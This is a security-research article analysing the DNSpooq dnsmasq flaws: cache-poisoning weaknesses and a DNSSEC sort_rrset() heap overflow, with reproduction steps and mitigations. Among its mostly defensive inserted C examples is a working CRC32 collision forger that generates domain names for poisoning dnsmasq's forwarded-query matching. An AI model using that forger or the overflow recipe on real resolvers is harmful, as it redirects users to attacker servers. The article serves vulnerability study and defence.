DNSpooq Vulnerability Series: Analysis and Reproduction

Published: 2021-02-01

Overview


Recently the Israeli security consultancy JSOF disclosed seven vulnerabilities in DNSmasq (collectively named DNSpooq) in its latest report, noting that they put millions of devices at risk. DNSmasq is a popular open-source DNS forwarder that adds DNS caching and DHCP server functionality to the network devices that run it, and it is widely used in all kinds of small local networks. Devices affected by DNSpooq are exposed not only to DNS cache poisoning but also to remote code execution and denial-of-service (DoS) attacks. Affected vendors currently include, but are not limited to, Android/Google, Comcast, Cisco, Red Hat, Netgear, Qualcomm, Linksys, IBM, D-Link and Ubiquiti. According to Shodan, more than one million devices running DNSmasq are reachable from the public Internet, and the number of potentially affected devices is far larger.


Three of the seven, CVE-2020-25684, CVE-2020-25685 and CVE-2020-25686, expose the DNS service to cache poisoning. The other four, CVE-2020-25687, CVE-2020-25683, CVE-2020-25682 and CVE-2020-25681, are buffer overflows, which an attacker may be able to use to execute arbitrary code remotely on network devices running DNSmasq.


DNS protocol overview


The basic unit of a DNS request or response is the DNS message. Requests and responses share exactly the same message layout; every message consists of the following five sections:


1.png


The DNS header is mandatory in every DNS message and has a fixed length of 12 bytes. The Question section holds the domain name being asked of the server; in practice it contains exactly one entry. Every entry has the same format, shown below:


2.png


QNAME: the domain name, encoded as a sequence of labels in the standard DNS name notation. The field is variable-length, so it may occupy an odd number of bytes, and no padding is added. A name is encoded as a series of labels (the components separated by '.' in the textual form); the high two bits of each label's first byte give the label type. RFC 1035 assigns two of the four possible values: 00 denotes an ordinary label whose low six bits are its length (0 to 63), and 11 (0xC0) denotes a compression pointer, whose remaining 14 bits are an offset from the start of the message at which the rest of the name continues.


The Answer, Authority and Additional sections share one format: each consists of zero or more Resource Records (RRs), kept in separate sections because they serve different purposes. The Answer section corresponds to the Question of the request: the result of the query is returned there. If the Answer section of a response is empty, the query produced no direct result.


The Resource Record (RR) is a central part of the DNS. It is a variable-length structure laid out as follows:


3.png


● NAME: the domain name this record belongs to, in the standard DNS name notation.

● TYPE: the record type.

● CLASS: corresponds to QCLASS in the Question and gives the class of the request; the usual value is IN, encoded as 0x0001.

● TTL (Time To Live): how long the record stays valid. It says the RR may be cached for TTL seconds; a TTL of 0 means the RR must not be cached. The field is 4 bytes; RFC 1035 describes it as signed but only values of 0 and above are used (RFC 2181 treats it as unsigned and clamps values with the high bit set to 0).

● RDLENGTH: a two-byte unsigned integer giving the length of the RDATA field in bytes.

● RDATA: a field whose length and structure both vary; its structure depends on the resource type given in TYPE.
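As an added example (not part of the original article), the following C parser reads the wire format just described: the 12-byte header, the question entry, and every RR of the three record sections. It follows 0xC0 compression pointers and rejects truncated messages, pointers that do not point backwards, and RDLENGTH values that would read past the end of the message, which is exactly the kind of check a forwarder has to make before trusting any length field. The response it parses is constructed for the example, not a capture.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DNS_MAXNAME 255            /* RFC 1035 limit on a decoded name */
#define DNS_MAXRR   16             /* enough for this example */

struct dns_header { uint16_t id, flags, qdcount, ancount, nscount, arcount; };

struct dns_rr {
    char name[DNS_MAXNAME + 1];   /* owner name in dotted form */
    uint16_t type, cls, rdlength;
    uint32_t ttl;
    const uint8_t *rdata;         /* points into the message, rdlength bytes */
};

struct dns_msg {
    struct dns_header h;
    char qname[DNS_MAXNAME + 1];
    uint16_t qtype, qclass;
    struct dns_rr rr[DNS_MAXRR];  /* answer, authority and additional RRs in wire order */
    int nrr;
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }
static uint32_t rd32(const uint8_t *p) { return ((uint32_t)rd16(p) << 16) | rd16(p + 2); }

/* Decode the name at `off` into `out` (dotted form), following 0xC0 pointers.
   Returns the offset just past the name's bytes in the message, or 0 on a
   truncated message, an unassigned label type, a pointer that does not point
   backwards, too many pointer hops, or a name longer than DNS_MAXNAME. */
size_t dns_read_name(const uint8_t *msg, size_t len, size_t off, char *out)
{
    size_t outlen = 0, next = 0;      /* `next` is fixed by the first pointer met */
    int hops = 0;
    for (;;) {
        if (off >= len) return 0;
        uint8_t c = msg[off];
        if ((c & 0xC0) == 0xC0) {                      /* compression pointer */
            if (off + 1 >= len || ++hops > 16) return 0;
            size_t target = ((size_t)(c & 0x3F) << 8) | msg[off + 1];
            if (!next) next = off + 2;
            if (target >= off) return 0;               /* self/forward pointer: loop or junk */
            off = target;
            continue;
        }
        if (c & 0xC0) return 0;                        /* 01xxxxxx / 10xxxxxx: unassigned */
        off++;
        if (c == 0) break;                             /* root label ends the name */
        if (off + c > len || outlen + c + 1 > DNS_MAXNAME) return 0;
        if (outlen) out[outlen++] = '.';
        memcpy(out + outlen, msg + off, c);
        outlen += c;
        off += c;
    }
    out[outlen] = '\0';
    return next ? next : off;
}

/* Parse the header, the single question and every RR. Returns 0 on success,
   -1 if any length field or pointer would read outside the message. */
int dns_parse(const uint8_t *msg, size_t len, struct dns_msg *m)
{
    if (len < 12) return -1;
    m->h.id = rd16(msg);          m->h.flags   = rd16(msg + 2);
    m->h.qdcount = rd16(msg + 4); m->h.ancount = rd16(msg + 6);
    m->h.nscount = rd16(msg + 8); m->h.arcount = rd16(msg + 10);
    if (m->h.qdcount != 1) return -1;              /* one question, as in practice */
    size_t off = dns_read_name(msg, len, 12, m->qname);
    if (!off || off + 4 > len) return -1;
    m->qtype = rd16(msg + off); m->qclass = rd16(msg + off + 2);
    off += 4;
    unsigned total = (unsigned)m->h.ancount + m->h.nscount + m->h.arcount;
    if (total > DNS_MAXRR) return -1;
    m->nrr = 0;
    for (unsigned i = 0; i < total; i++) {
        struct dns_rr *r = &m->rr[m->nrr];
        off = dns_read_name(msg, len, off, r->name);
        if (!off || off + 10 > len) return -1;
        r->type = rd16(msg + off);     r->cls = rd16(msg + off + 2);
        r->ttl  = rd32(msg + off + 4); r->rdlength = rd16(msg + off + 8);
        off += 10;
        if (r->rdlength > len - off) return -1;    /* RDLENGTH must fit the message */
        r->rdata = msg + off;
        off += r->rdlength;
        m->nrr++;
    }
    return 0;
}

/* Constructed response (not a capture): question www.example.com A IN, answer
   www.example.com CNAME cdn.example.com (owner via pointer 0xC00C, target via
   0xC010), then cdn.example.com A 1.2.3.4 (owner via pointer 0xC02D). */
const uint8_t sample_response[] = {
    0x12,0x34, 0x81,0x80, 0x00,0x01, 0x00,0x02, 0x00,0x00, 0x00,0x00,
    3,'w','w','w', 7,'e','x','a','m','p','l','e', 3,'c','o','m', 0, 0x00,0x01, 0x00,0x01,
    0xC0,0x0C, 0x00,0x05, 0x00,0x01, 0x00,0x00,0x0E,0x10, 0x00,0x06, 3,'c','d','n', 0xC0,0x10,
    0xC0,0x2D, 0x00,0x01, 0x00,0x01, 0x00,0x00,0x00,0x3C, 0x00,0x04, 1,2,3,4,
};

int main(void)
{
    struct dns_msg m;
    if (dns_parse(sample_response, sizeof sample_response, &m) != 0) return 1;
    printf("question %s type %u, %d RRs\n", m.qname, m.qtype, m.nrr);
    for (int i = 0; i < m.nrr; i++)
        printf("  %s type %u ttl %u rdlength %u\n", m.rr[i].name, m.rr[i].type, m.rr[i].ttl, m.rr[i].rdlength);
    return 0;
}
```

The parser keeps RDATA as a pointer into the message; a caller that wants the CNAME target calls dns_read_name() on that offset, which applies the same bounds as for owner names.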

The common DNS record types are NS, A and CNAME records.

● NS records

An NS record names an authoritative DNS server of a zone. For example, the DNS servers for com hold the NS records of the m.wangyinli.com zone, which might look like this:

m.wangyinli.com.  NS ns1.m.wangyinli.com. 

m.wangyinli.com.  NS ns2.m.wangyinli.com. 

m.wangyinli.com.  NS ns3.m.wangyinli.com.


These three records say that ns1.m.wangyinli.com, ns2.m.wangyinli.com and ns3.m.wangyinli.com (ns1, ns2 and ns3 below) are all authoritative DNS servers for m.wangyinli.com, and any one of them may be queried.


The authoritative servers for com also hold the IP addresses of ns1 to ns3 (glue records) and return them together with the NS records, so the querier can contact ns1 to ns3 directly by IP.


● A records


An A record is the classic mapping from a domain name to an IP address. ns1.m.wangyinli.com holds the name-to-IP mappings for the company's products; each such mapping is one A record, for example the following three:


image.m.wangyinli.com   A    1.2.3.4 

wenku.m.wangyinli.com   A    5.6.7.8 

tieba.m.wangyinli.com     A    9.10.11.12


When a user asks ns1.m.wangyinli.com "what is the IP address of wenku.m.wangyinli.com?", ns1 finds the matching A record (or CNAME record) and returns it.


● CNAME records


A CNAME record, also called an alias record, lets several names map to the same host. For example, ns1 has no A record for www.m.wangyinli.com but instead a CNAME record:


www.m.wangyinli.com  CNAME  www.a.shifen.com


This tells the user that www.m.wangyinli.com is an alias of www.a.shifen.com, and that www.a.shifen.com can be resolved directly.


DNS cache poisoning


When a user visits www.m.wangyinli.com, name resolution roughly follows the flow in the figure below.


4.png


DNS cache poisoning is a classic attack. If it succeeds, the attacker plants a bogus entry on the caching DNS server, so that users' requests for a legitimate site are redirected to a malicious site under the attacker's control.


A simplified attack flow for the DNSpooq cache-poisoning vulnerabilities is shown below:


5.png


(1) The user sends the DNS forwarder a request to resolve the Taobao site, expecting its IP address in return.

(2) The forwarder has no cached entry for the name, so it forwards the request to the upstream DNS server.

(3) Before the upstream server's reply arrives, the attacker sends a forged reply that maps the Taobao name to a malicious IP address.

(4) The forwarder accepts the forged reply and passes it on to the user, so the user's visit to Taobao is redirected to the malicious site controlled by the attacker.


DNS forwarders are deployed everywhere: personal hotspots, the public networks of airports and hotels, and so on. A successful attack affects everyone using that network.


The DNS header contains a 16-bit field, the TXID (transaction ID), used to match reply packets to query packets. Historically the TXID was the main defense against cache poisoning. In 2008, however, the security researcher Dan Kaminsky showed that a 16-bit TXID is far from sufficient, and source-port randomization was added afterwards. To forge a reply today the attacker must guess not only the TXID but also the source port, 32 random bits in total, and must also know the source and destination IP addresses.


DNS Security Extensions


In the 21st century the DNS Security Extensions (DNSSEC) have gradually been adopted. DNSSEC is a security mechanism designed to address DNS spoofing and cache poisoning. It relies on digital signatures to guarantee the authenticity and integrity of DNS responses. In short, the authoritative server signs its resource records with a private key, and the recursive server verifies the response with the authoritative server's public key. If verification fails, the message is treated as suspect.


To sign and verify resource records, DNSSEC adds four record types: RRSIG (Resource Record Signature), DNSKEY (DNS Public Key), DS (Delegation Signer) and NSEC (Next Secure).


For example, running dig @8.8.8.8 paypal.com gives the following result:


6.png


The red box marks the answer section; this is the result without DNSSEC records requested. Running dig +dnssec @8.8.8.8 paypal.com gives:


7.png


The blue box marks the RRSIG record, which carries the digital signature over the resource record set (RRset).


Dnsmasq cache-poisoning vulnerabilities


The following three vulnerabilities, used together, reduce the entropy an attacker must overcome to forge a reply.


● CVE-2020-25684


DNSmasq limits the number of queries forwarded to upstream servers at any one time; the default maximum is 150, and the user can configure the value. Forwarded queries are tracked with frec (forward record) structures, each associated with a TXID. A frec is deleted when its reply is accepted or after a timeout.


Normally the number of sockets used for forwarding is limited to 64, and each forwarding socket is bound to a random port.

In theory the TXID and source port of a query together provide 32 bits of entropy. In practice there is less: dnsmasq multiplexes several TXIDs over the same port rather than pairing each TXID with exactly one port, as the figure below shows. The attacker therefore only has to hit any one of the 64 ports in use together with a valid TXID, rather than one specific port paired with one specific TXID. Since only 64 of the 65536 possible ports are in use, the port contributes about 10 bits instead of 16, leaving roughly 26 bits of effective entropy.


8.png


● CVE-2020-25685


To poison the forwarder, besides guessing the correct TXID and source port, the attacker's forged reply must also match an open frec. A frec matches only if both the TXID and the question section match; in other words, the reply must answer a question that was actually asked.


dnsmasq does not store the whole question; it stores only a hash of the question section, computed when the query is forwarded.


If dnsmasq is built without DNSSEC support, it uses CRC32 as that hash by default. The problem is that CRC32 is not a cryptographic hash: CRC32 collisions are easy to produce, for instance with an SMT solver such as Z3, and the details are not covered here.


Based on this property, the attacker can generate many queries for different names whose question sections all have the same CRC32 value. These names should preferably not exist, i.e. not be cached yet. The attacker then sends a forged reply whose question section has the same CRC32 value.


As the figure shows, the attacker controls a client that queries many domain names whose question sections all share one CRC32 value, then, before the recursive DNS server replies, sends a reply for a name or IP with the same CRC32 value; the attack may then succeed.


9.png
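As an added example (not from the original article or from JSOF), here is a way to produce the colliding names without a solver at all: CRC32 is linear, so the four trailing bytes of a message can be chosen to steer the CRC register to any target value, and the register can be run backwards over known bytes. The code below builds a wire-format question for an attacker-chosen name "<8 chars><4 forged bytes>.attacker.example" whose CRC32 equals that of the victim's question, retrying nonces until the forged bytes are all letters or digits. Hashing the raw question bytes (QNAME, QTYPE, QCLASS) is a stand-in for dnsmasq's own hash input, whose exact byte layout is not reproduced here; the victim and attacker names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static uint32_t T[256];
static uint8_t  inv_top[256];   /* inv_top[T[i] >> 24] == i: the high bytes of T are a permutation */
static int      tables_ready;

static void crc32_tables(void)
{
    if (tables_ready) return;
    for (uint32_t i = 0; i < 256; i++) {
        uint32_t c = i;
        for (int k = 0; k < 8; k++)
            c = (c & 1) ? (0xEDB88320u ^ (c >> 1)) : (c >> 1);
        T[i] = c;
        inv_top[c >> 24] = (uint8_t)i;
    }
    tables_ready = 1;
}

/* Run the CRC register forward over p[0..n). */
static uint32_t crc32_update(uint32_t reg, const uint8_t *p, size_t n)
{
    crc32_tables();
    for (size_t i = 0; i < n; i++)
        reg = T[(reg ^ p[i]) & 0xFFu] ^ (reg >> 8);
    return reg;
}

/* Run the register backwards over known bytes: the exact inverse of crc32_update. */
static uint32_t crc32_unupdate(uint32_t reg, const uint8_t *p, size_t n)
{
    crc32_tables();
    while (n-- > 0) {
        uint8_t idx = inv_top[reg >> 24];
        reg = ((reg ^ T[idx]) << 8) | ((idx ^ p[n]) & 0xFFu);
    }
    return reg;
}

/* Standard zlib-compatible CRC-32 (init and final XOR 0xFFFFFFFF). */
uint32_t crc32(const uint8_t *p, size_t n)
{
    return crc32_update(0xFFFFFFFFu, p, n) ^ 0xFFFFFFFFu;
}

/* Pick 4 bytes that take the register from `reg` to exactly `target`. After 4
   steps the register equals T[i3] ^ T[i2]>>8 ^ T[i1]>>16 ^ T[i0]>>24, so the
   table indices are solved from the top byte down; each byte is then whatever
   makes the running register select that index. */
static void crc32_forge4(uint32_t reg, uint32_t target, uint8_t patch[4])
{
    uint8_t idx[4];
    crc32_tables();
    for (int i = 3; i >= 0; i--) {
        idx[i] = inv_top[target >> 24];
        target = (target ^ T[idx[i]]) << 8;
    }
    for (int i = 0; i < 4; i++) {
        patch[i] = (uint8_t)((reg ^ idx[i]) & 0xFFu);
        reg = T[idx[i]] ^ (reg >> 8);
    }
}

/* Wire-format question section: length-prefixed labels, root, QTYPE, QCLASS. */
size_t build_question(uint8_t *out, size_t cap, const char *name, uint16_t qtype, uint16_t qclass)
{
    size_t o = 0;
    while (*name) {
        const char *dot = strchr(name, '.');
        size_t len = dot ? (size_t)(dot - name) : strlen(name);
        if (len == 0 || len > 63 || o + 1 + len + 5 > cap) return 0;
        out[o++] = (uint8_t)len;
        memcpy(out + o, name, len);
        o += len;
        name += len + (dot ? 1 : 0);
    }
    out[o++] = 0;
    out[o++] = (uint8_t)(qtype >> 8);  out[o++] = (uint8_t)qtype;
    out[o++] = (uint8_t)(qclass >> 8); out[o++] = (uint8_t)qclass;
    return o;
}

/* Build "<8 chars><4 forged bytes>.<zone>" whose IN/A question has the same
   CRC32 as the victim's IN/A question. Nonces are tried until all 4 forged
   bytes fall in [a-z0-9], so the label is legal. Returns 1 on success, else 0. */
int forge_colliding_name(const char *victim, const char *zone, char *out, size_t outsz)
{
    uint8_t vq[512], suffix[512];
    size_t vlen = build_question(vq, sizeof vq, victim, 1, 1);
    size_t slen = build_question(suffix, sizeof suffix, zone, 1, 1);  /* the bytes after the patch */
    if (!vlen || !slen) return 0;
    uint32_t victim_reg = crc32_update(0xFFFFFFFFu, vq, vlen);
    uint32_t target = crc32_unupdate(victim_reg, suffix, slen);      /* register needed before suffix */
    for (unsigned nonce = 0; nonce < 200000; nonce++) {
        uint8_t head[10], patch[4];
        head[0] = 12;                                                /* label length: 8 + 4 */
        snprintf((char *)head + 1, 9, "x%07u", nonce);
        crc32_forge4(crc32_update(0xFFFFFFFFu, head, 9), target, patch);
        int ok = 1;
        for (int i = 0; i < 4; i++)
            ok = ok && ((patch[i] >= 'a' && patch[i] <= 'z') || (patch[i] >= '0' && patch[i] <= '9'));
        if (!ok) continue;
        int n = snprintf(out, outsz, "%.8s%c%c%c%c.%s", (char *)head + 1,
                         patch[0], patch[1], patch[2], patch[3], zone);
        return (n > 0 && (size_t)n < outsz) ? 1 : 0;
    }
    return 0;
}

int main(void)
{
    char forged[256];
    uint8_t q1[512], q2[512];
    if (!forge_colliding_name("www.bank.example", "attacker.example", forged, sizeof forged)) return 1;
    size_t n1 = build_question(q1, sizeof q1, "www.bank.example", 1, 1);
    size_t n2 = build_question(q2, sizeof q2, forged, 1, 1);
    printf("www.bank.example -> %08x\n%s -> %08x\n", crc32(q1, n1), forged, crc32(q2, n2));
    return 0;
}
```

Each nonce yields exactly one 4-byte solution, and about one in (256/36)^4, roughly 2600, is all alphanumeric, so a few thousand CRC evaluations suffice per colliding name. Nothing here depends on the victim name being known in advance of the attack beyond its question bytes, which is why a keyed or cryptographic hash (as dnsmasq uses when built with DNSSEC) removes the attack.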


● CVE-2020-25686


Another dnsmasq problem is that when the same name is requested several times, it creates a separate frec for every request and forwards all of them; if a forged reply matches any one of them, it is cached. Every outstanding frec for the name is an extra target, so the attack can succeed even when dnsmasq uses a secure hash.


These three vulnerabilities greatly raise the success rate of forged replies. The attack then relies on a further property: dnsmasq does not validate the contents of the replies it accepts.


Recursive resolvers usually apply some checks to reply packets, for example bailiwick checks. Devices running dnsmasq perform no such check, so when a user requests www.example.com the attacker can send the following reply:


www.example.com  CNAME  www.bank.com

www.bank.com           A         6.6.6.6


These records are then inserted into the dnsmasq cache. Given how CNAME records work (see above), when a user later visits www.bank.com they are redirected to the attacker-controlled server at 6.6.6.6. A device that applies bailiwick checks would instead discard the out-of-zone A record and ask the authoritative server for the IP address of www.bank.com.
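The bailiwick check that the text says dnsmasq lacks, as an added example in C (not dnsmasq's code). It models a resolver that knows the zone the answering server is authoritative for (assumed to be example.com here) and caches only records whose owner name lies inside that zone, matching on label boundaries and case-insensitively. Run over the forged reply from the text, it keeps the CNAME and drops the A record for www.bank.com.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

struct rr { const char *owner; const char *type; const char *data; };

static int eq_icase(const char *a, const char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* 1 if `name` is `zone` or a subdomain of it. The match is case-insensitive
   and must end on a label boundary: "notbank.com" is not inside "bank.com". */
int name_in_zone(const char *name, const char *zone)
{
    size_t nl = strlen(name), zl = strlen(zone);
    if (nl < zl || !eq_icase(name + nl - zl, zone, zl)) return 0;
    return nl == zl || name[nl - zl - 1] == '.';
}

/* Keep only the records whose owner lies inside `zone`, the zone the server
   that answered is authoritative for; everything else is out of bailiwick
   and must be re-resolved rather than cached. Returns how many were kept. */
int bailiwick_filter(const struct rr *in, int n, const char *zone, struct rr *out)
{
    int kept = 0;
    for (int i = 0; i < n; i++)
        if (name_in_zone(in[i].owner, zone)) out[kept++] = in[i];
    return kept;
}

/* The forged reply from the text, as constructed data. */
const struct rr forged_reply[2] = {
    { "www.example.com", "CNAME", "www.bank.com" },
    { "www.bank.com",    "A",     "6.6.6.6"      },
};

int main(void)
{
    struct rr kept[2];
    int n = bailiwick_filter(forged_reply, 2, "example.com", kept);
    for (int i = 0; i < n; i++)
        printf("cache: %s %s %s\n", kept[i].owner, kept[i].type, kept[i].data);
    printf("dropped %d out-of-bailiwick record(s)\n", 2 - n);
    return 0;
}
```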


Dnsmasq buffer-overflow vulnerabilities



● CVE-2020-25681


The names below are sorted in canonical DNS name order. The most significant label is "example". At this level "example" sorts first, followed by the names ending in "a.example" and then those ending in "z.example"; within each level the names are ordered the same way, as the figure shows.


10.png


CVE-2020-25681 lies in the sort_rrset() function in dnssec.c, which uses a bubble sort to put a given resource record set (RRset) into canonical order, as the DNSSEC validation process requires. The function is defined as follows:


11.png


It takes the response packet (header) and its length (plen). rrset points to the array of RRs in the set, rrsetidx is the number of RRs in the set, and rr_desc points to the descriptor of the RR type of the set. Finally, buff1 and buff2 are two buffers used as workspace by the sorting routine. Both are allocated once at program start-up when DNSSEC is enabled: they are daemon->workspacename and daemon->keyname.


12.png


MAXDNAME is 1025, so workspacename and keyname are each 2050 bytes; these are the buffers the vulnerability overflows.


First start dnsmasq with the following parameters:

-p 53535 --no-daemon --log-queries -S127.0.0.2 --no-hosts --no-resolv -d -q --dnssec --trust-anchor=.,20326,8,2,E06D44B80B8F1D39A95C0B0D7C65D08458E880409BBC683457104237C7F8EC8D

Craft a malicious DNS response (served from the upstream at 127.0.0.2), then run dig NS +dnssec @localhost -p 53535 . and the breakpoint on sort_rrset() is hit, as shown below:


13.png


When crafting the resource record set (RRset), it must contain more than one record, otherwise the sort loop is never entered.


Here the crafted rrsetidx is 0x3.


14.png


A normal packet looks like this:


15.png


In the Answers block, p1 points to the first resource record and p2 to the second; sorting then begins.


16.png


Class, Type and TTL are skipped in turn to reach the RDATA field.


17.png


The data length is 20, the length of the name server name. The sort loop is then entered.


18.png


At line 315, get_rdata() is first called to parse the name server name in the RDATA of the first record, p1. Its implementation is as follows.


19.png


It checks whether d equals -1; here it does not, so the if branch is skipped and execution reaches the following code.


20.png


extract_name() is then called to parse the name. To make get_rdata() return 0, extract_name() must fail and return 0, which is achieved simply by supplying an over-long name server name.


21.png


Inside the if branch, line 318 computes len1 = end1 - p1, the length of the name server name, and line 319 calls memcpy() to copy p1 into buff1 + left1.


22.png


Here len1 is 3550: p1 is the name server name and its length, RDLENGTH, is attacker-controlled, while nothing bounds len1 against the workspace. As noted above, buff1 is daemon->workspacename, which is only 2050 bytes, so the copy overflows the heap buffer.


23.png
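As an added example (not dnsmasq's code), the following C models the two things sort_rrset() does that the analysis above touches: it orders names in the canonical order described for CVE-2020-25681 (RFC 4034 section 6.1: compare label by label from the rightmost label, lowercase, shorter prefix first), and it copies RDATA into a fixed 2050-byte workspace with the bound that the unchecked memcpy at line 319 lacks. The workspace size follows the MAXDNAME * 2 allocation described above; the record list is constructed from the RFC's own ordering example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAXDNAME 1025                 /* dnsmasq's name limit */
#define WORKSPACE_LEN (MAXDNAME * 2)  /* size of daemon->workspacename / keyname */

/* Split a dotted name into its labels (at most 128), returning the count. */
static int split_labels(const char *name, const char *labels[128], size_t lens[128])
{
    int n = 0;
    const char *p = name;
    while (*p && n < 128) {
        const char *dot = strchr(p, '.');
        labels[n] = p;
        lens[n] = dot ? (size_t)(dot - p) : strlen(p);
        n++;
        if (!dot) break;
        p = dot + 1;
    }
    return n;
}

/* Compare two labels as lowercase octet strings; a proper prefix sorts first. */
static int label_cmp(const char *a, size_t al, const char *b, size_t bl)
{
    size_t n = al < bl ? al : bl;
    for (size_t i = 0; i < n; i++) {
        int d = tolower((unsigned char)a[i]) - tolower((unsigned char)b[i]);
        if (d) return d;
    }
    return (int)al - (int)bl;
}

/* RFC 4034 section 6.1 canonical name order: compare label by label starting
   from the rightmost (most significant) label; the name that runs out of
   labels first sorts first. Returns <0, 0 or >0 like strcmp. */
int canonical_name_cmp(const char *a, const char *b)
{
    const char *la[128], *lb[128];
    size_t lal[128], lbl[128];
    int na = split_labels(a, la, lal), nb = split_labels(b, lb, lbl);
    for (int i = 1; i <= na && i <= nb; i++) {
        int d = label_cmp(la[na - i], lal[na - i], lb[nb - i], lbl[nb - i]);
        if (d) return d;
    }
    return na - nb;
}

/* Append `len` bytes of RDATA to the 2050-byte workspace at offset *used.
   This is the bound the original copy lacked: with an attacker-chosen
   RDLENGTH (3550 in the text) an unchecked memcpy overruns the heap buffer.
   Returns 0 on success, -1 (and copies nothing) if the data would not fit. */
int workspace_append(unsigned char *ws, size_t *used, const unsigned char *rdata, size_t len)
{
    if (*used > WORKSPACE_LEN || len > WORKSPACE_LEN - *used) return -1;
    memcpy(ws + *used, rdata, len);
    *used += len;
    return 0;
}

/* Bubble-sort NS target names into canonical order, as sort_rrset() does for an RRset. */
void sort_names_canonical(const char *names[], int n)
{
    for (int i = 0; i < n - 1; i++)
        for (int j = 0; j < n - 1 - i; j++)
            if (canonical_name_cmp(names[j], names[j + 1]) > 0) {
                const char *t = names[j]; names[j] = names[j + 1]; names[j + 1] = t;
            }
}

int main(void)
{
    /* constructed from the RFC 4034 section 6.1 ordering example */
    const char *names[] = { "z.example", "zABC.a.EXAMPLE", "a.example",
                            "Z.a.example", "example", "yljkjljk.a.example" };
    sort_names_canonical(names, 6);
    for (int i = 0; i < 6; i++) printf("%s\n", names[i]);

    unsigned char ws[WORKSPACE_LEN], big[3550];
    size_t used = 0;
    memset(big, 'A', sizeof big);
    printf("append 20 bytes: %d, append 3550 bytes: %d\n",
           workspace_append(ws, &used, big, 20), workspace_append(ws, &used, big, 3550));
    return 0;
}
```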


Mitigations


● Upgrade dnsmasq to the latest version (2.83 or later); this is currently the most effective measure.

● Unless it is required, configure the dnsmasq device not to listen on the WAN interface.

● Lower the maximum number of concurrently forwarded queries (dns-forward-max) as far as practical, since every outstanding query is a target for a forged reply.

● Temporarily disable the DNSSEC validation option; the buffer overflows analysed above are in the DNSSEC validation code.

● Use a protocol that provides transport security for DNS, such as DoT or DoH.
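As an added example of how these mitigations map onto dnsmasq.conf directives (this is not from the original article or from the dnsmasq project; the interface names and the upstream address are assumptions):

```conf
# Weak: listening on every interface including the WAN side, the default of
# 150 in-flight forwarded queries, and DNSSEC validation on a pre-2.83 build.
#   (no interface= / except-interface= / bind-interfaces lines)
#   dnssec
#   trust-anchor=.,20326,8,2,E06D44B80B8F1D39A95C0B0D7C65D08458E880409BBC683457104237C7F8EC8D

# Hardened (until the upgrade to 2.83 or later is done):
interface=br-lan          # answer only on the LAN bridge (interface name assumed)
except-interface=eth0     # never listen on the WAN port (interface name assumed)
bind-interfaces           # bind those interfaces only, not 0.0.0.0
dns-forward-max=64        # fewer outstanding frecs for a spoofed reply to match
# dnssec                  # leave validation off on 2.82 and earlier (sort_rrset overflow)
no-resolv                 # ignore /etc/resolv.conf, use only the server= line below
server=127.0.0.1#5353     # assumed: a local DoT/DoH stub resolver listening on this port
```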


References:

[1] https://www.jsof-tech.com/disclosures/dnspooq/

[2] https://www.jsof-tech.com/wp-content/uploads/2021/01/DNSpooq-Technical-WP.pdf

[3] https://www.rfc-editor.org/rfc/rfc1664.txt

[4] https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

[5] https://spoofer.caida.org/summary.php

[6] https://www.rfc-editor.org/rfc/rfc7858.txt

[7] https://www.rfc-editor.org/rfc/rfc5452.txt

[8] http://www.thekelleys.org.uk/dnsmasq/doc.html

[9] https://dl.acm.org/doi/10.1145/3372297.3417280

[10] https://github.com/Z3Prover/z3

[11] https://www.chromium.org/developers/design-documents/dns-prefetching

[12] https://www.rfc-editor.org/rfc/rfc4033.txt

[13] https://zhuanlan.zhihu.com/p/92899876


Active-Defense Laboratory (ADLab)


ADLab was founded in 1999 and is one of the earliest offensive and defensive technology research laboratories in China's security industry, a core member of the Microsoft MAPP program, and the originator of the "黑雀攻击" (blackbird attack) concept. To date ADLab has published close to 1,100 security vulnerabilities through CVE and more than 1,000 through CNVD/CNNVD, maintaining a first-class standing in the international network security field. Its research covers operating system and application security, smart terminal security, IoT device security, web security, industrial control system security and cloud security. Its results are applied to core product technology research, key national science and technology projects, and professional security services.


adlab.jpg